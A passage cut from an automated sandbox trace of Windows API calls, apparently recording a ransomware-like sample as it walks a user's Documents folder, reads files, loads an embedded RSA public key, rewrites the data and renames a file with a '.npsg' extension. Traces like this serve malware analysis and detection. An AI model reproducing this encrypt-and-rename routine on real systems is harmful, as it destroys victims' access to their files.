dwFlags=0x0, lpMem=0x3b891c8 | out: hHeap=0x620000) returned 1 [0246.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0246.335] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891c8 [0246.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0246.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89180 [0246.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8660 [0246.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x3b89168 [0246.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0246.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7b948 [0246.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0246.335] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0246.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0246.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7b830 [0246.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8780 [0246.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0246.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0246.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89180 | out: hHeap=0x620000) returned 1 [0246.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89168 | out: hHeap=0x620000) returned 1 [0246.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0246.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891c8 | out: hHeap=0x620000) returned 1 [0246.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecc28 | out: hHeap=0x620000) returned 1 [0246.336] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0246.336] GetCurrentThreadId () returned 0x5b4 [0246.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0246.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b8ad38 [0246.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c1920 [0246.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a110 [0246.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x33c2ee8 [0246.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373548 [0246.336] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x340dd38 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.337] GetCurrentThreadId () returned 0x5b4 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x64dd08 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x675190 [0246.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0246.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0246.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c4ac0 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x3384ae0 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891c8 [0246.337] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0246.337] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x33734f8 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89168 [0246.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0246.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373528 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89180 [0246.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8660 [0246.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89150 [0246.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b891e0 [0246.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0246.338] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0246.338] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b891b0 [0246.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0246.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3b89198 [0246.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b891f8 [0246.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89198 | out: hHeap=0x620000) returned 1 [0246.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89198 [0246.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891b0 | out: hHeap=0x620000) returned 1 [0246.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0246.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0246.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0246.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0246.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd518 [0246.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89168 | out: hHeap=0x620000) returned 1 [0246.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3b89168 [0246.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0246.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90a38 [0246.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891c8 | out: hHeap=0x620000) returned 1 [0246.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0246.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891f8 | out: hHeap=0x620000) returned 1 [0246.339] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x33e3b68 [0246.339] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0246.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7ba60 [0246.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33734f8 | out: hHeap=0x620000) returned 1 [0246.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7bc90 [0246.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89168 | out: hHeap=0x620000) returned 1 [0246.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x3b947f8 [0246.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0246.340] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33a9510 [0246.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0246.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a110 | out: hHeap=0x620000) returned 1 [0246.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0246.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a9510 | out: hHeap=0x620000) returned 1 [0246.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0246.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bc90 | out: hHeap=0x620000) returned 1 [0246.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33e3b68 | out: hHeap=0x620000) returned 1 [0246.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0246.340] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89198 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b891e0 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8660 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89180 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89150 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b89138 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ffe8 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90a38 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3384ae0 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.341] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.341] WriteFile (in: hFile=0x644, lpBuffer=0x3b99d50*, nNumberOfBytesToWrite=0x73f0, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b99d50*, lpNumberOfBytesWritten=0x39afb14*=0x73f0, lpOverlapped=0x0) returned 1 [0246.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b99d50 | out: hHeap=0x620000) returned 1 [0246.342] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x73f5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.342] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0246.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d188 [0246.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x3b947f8 [0246.342] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x3b947f8, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0246.342] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x346fa00 [0246.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b947f8 | out: hHeap=0x620000) returned 1 [0246.342] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d188 | out: hHeap=0x620000) returned 1 [0246.342] WriteFile (in: hFile=0x644, lpBuffer=0x346fa00*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x346fa00*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0246.343] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa00 | out: hHeap=0x620000) returned 1 [0246.343] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0246.343] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0246.343] CloseHandle (hObject=0x644) returned 1 [0246.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xf0) returned 0x33b8188 [0246.344] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x900) returned 0x3b8ccd0 [0246.344] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0246.344] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\kqXbmw04O-KCrgMb.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\kqxbmw04o-kcrgmb.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\kqXbmw04O-KCrgMb.csv.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\kqxbmw04o-kcrgmb.csv.npsg")) returned 1 [0246.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0246.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.345] VirtualFree (lpAddress=0x39b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0246.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0246.347] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbac69cc0, ftCreationTime.dwHighDateTime=0x1d5c223, ftLastAccessTime.dwLowDateTime=0x561ad360, ftLastAccessTime.dwHighDateTime=0x1d5c528, ftLastWriteTime.dwLowDateTime=0x561ad360, ftLastWriteTime.dwHighDateTime=0x1d5c528, nFileSizeHigh=0x0, nFileSizeLow=0x311a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="lPmnkpeSvkzaZE.odt", cAlternateFileName="LPMNKP~1.ODT")) returned 1 [0246.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8ae0 [0246.347] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11e) returned 0x6affc0 [0246.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8ae0 | out: hHeap=0x620000) returned 1 [0246.347] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\lPmnkpeSvkzaZE.odt") returned=".odt" [0246.347] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Ji_heo\\ZLJLwY4 p8u\\gTnYqN V h\\ma0LRjiKCyKK4\\D0CsPE54nS\\lPmnkpeSvkzaZE.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ji_heo\\zljlwy4 p8u\\gtnyqn v h\\ma0lrjikcykk4\\d0cspe54ns\\lpmnkpesvkzaze.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0246.350] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=12570) returned 1 [0246.350] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0246.353] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x30f4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.353] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0246.354] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.355] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x311a, lpOverlapped=0x0) returned 1 [0246.355] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.355] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0246.355] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.355] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0246.355] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a110) returned 1 [0246.356] CryptCreateHash (in: hProv=0x67a110, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0246.356] CryptHashData (hHash=0x33f0488, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0246.356] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0246.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0246.356] CryptGetHashParam (in: hHash=0x33f0488, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0246.356] GetLastError () returned 0x0 [0246.356] CryptDestroyHash (hHash=0x33f0488) returned 1 [0246.356] CryptReleaseContext (hProv=0x67a110, dwFlags=0x0) returned 1 [0246.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0246.357] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0246.357] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1a38 [0246.357] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0246.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3120) returned 0x3b99d50 [0246.357] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0246.357] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1a38 | out: hHeap=0x620000) returned 1 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0246.357] RtlAllocateHeap (HeapHandle=0x620000, 